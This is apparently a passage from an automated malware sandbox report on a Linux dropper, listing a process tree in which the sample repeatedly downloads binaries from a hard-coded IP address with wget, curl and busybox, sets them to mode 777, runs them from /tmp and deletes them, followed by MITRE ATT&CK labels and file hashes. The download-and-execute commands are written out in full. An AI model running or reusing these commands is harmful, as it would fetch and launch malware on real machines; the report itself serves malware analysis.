/usr/bin/wgetwget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:974
-
-
/bin/chmodchmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:981
-
-
/bin/chmodchmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:985
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:986
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:988
-
-
/bin/chmodchmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309./nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:992
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:993
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:995
-
-
/bin/chmodchmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:999
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1000
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1002
-
-
/bin/chmodchmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1006
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1007
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1009
-
-
/bin/chmodchmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1013
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1014
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1016
-
-
/bin/chmodchmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7